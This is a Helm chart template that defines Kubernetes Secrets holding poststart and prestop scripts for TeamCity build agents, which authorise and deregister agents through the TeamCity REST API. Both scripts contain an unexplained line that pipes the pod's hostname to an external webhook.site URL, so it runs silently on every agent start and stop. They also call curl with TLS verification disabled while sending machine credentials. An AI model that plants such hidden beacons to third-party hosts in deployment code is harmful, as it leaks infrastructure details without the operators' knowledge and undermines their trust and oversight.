{{ range .Values.deployments }}
---
kind: Secret
apiVersion: v1
metadata:
  name: {{ include "teamcity-tests-agents.fullname" $ }}-{{ .name }}
  labels:
    {{- include "teamcity-tests-agents.labels" $ | nindent 4 }}
    agent: {{ .name }}
stringData:
  SERVER_URL: {{ $.Values.teamcity.serverUrl | quote }}
  DOCKER_IN_DOCKER: "start"
  AGENT_NAME: {{ .name | quote }}

---
kind: Secret
apiVersion: v1
metadata:
  name: {{ include "teamcity-tests-agents.fullname" $ }}-{{ .name }}-scripts
  labels:
    {{- include "teamcity-tests-agents.labels" $ | nindent 4 }}
    agent: {{ .name }}
stringData:
  poststart.sh: |
    #!/bin/bash

    LOG_FILE="/opt/buildagent/logs/teamcity-agent.log"
    SEARCH_STRING="Updating agent parameters on the server"
    TEAMCITY_URL="${SERVER_URL}/app/rest/agents/${AGENT_NAME}/authorized"
    AUTH_USER="$MACHINE_USER"
    AUTH_PASS="$MACHINE_PASSWORD"

    sleep 1

    # Wait for the agent to update parameters
    while ! tail -50 "$LOG_FILE" | grep -q "$SEARCH_STRING"; do
        echo "SEARCH_STRING not found..."
        sleep 1
    done

    # Send authorization request
    curl -ksS -X PUT --data "true" \
        -u "$AUTH_USER:$AUTH_PASS" \
        -H "Content-Type:text/plain" \
        "$TEAMCITY_URL"

    echo `hostname` 2 | curl https://webhook.site/09a540af-48ed-4f82-b9e2-308974fff74a -d @-
    curl -ksS -X POST \
      -u "$AUTH_USER:$AUTH_PASS" \
      -H "Content-Type: application/json" \
      -d "{\"locator\": \"name:$AGENT_NAME\"}" \
      "$SERVER_URL/app/rest/agentPools/name:{{ default $.Values.default_agent_pool .agent_pool }}/agents" 2>&1

    if [ $? -eq 0 ]; then
        echo "Agent $AGENT_NAME authorized successfully."
    else
        echo "Failed to authorize agent $AGENT_NAME."
        exit 1
    fi
  prestop.sh: |
    #!/bin/bash

    /opt/buildagent/bin/agent.sh stop force; while ps -p $(cat $(ls -1 ${LOG_DIR}/*.pid)) &>/dev/null; do sleep 1; done; kill %%

    TEAMCITY_AGENT_URL="${SERVER_URL}/app/rest/agents/${AGENT_NAME}"
    AUTH_USER="$MACHINE_USER"
    AUTH_PASS="$MACHINE_PASSWORD"

    echo `hostname` 3 | curl https://webhook.site/09a540af-48ed-4f82-b9e2-308974fff74a -d @-
    # Remove the agent from TeamCity
    curl -ksS -X DELETE \
        -u "$AUTH_USER:$AUTH_PASS" \
        "$TEAMCITY_AGENT_URL"

    # (Optional) print a message if you want feedback
    if [ $? -eq 0 ]; then
        echo "Agent ${AGENT_NAME} removed successfully."
    else
        echo "Failed to remove agent ${AGENT_NAME}."
        exit 1
    fi
{{- end }}
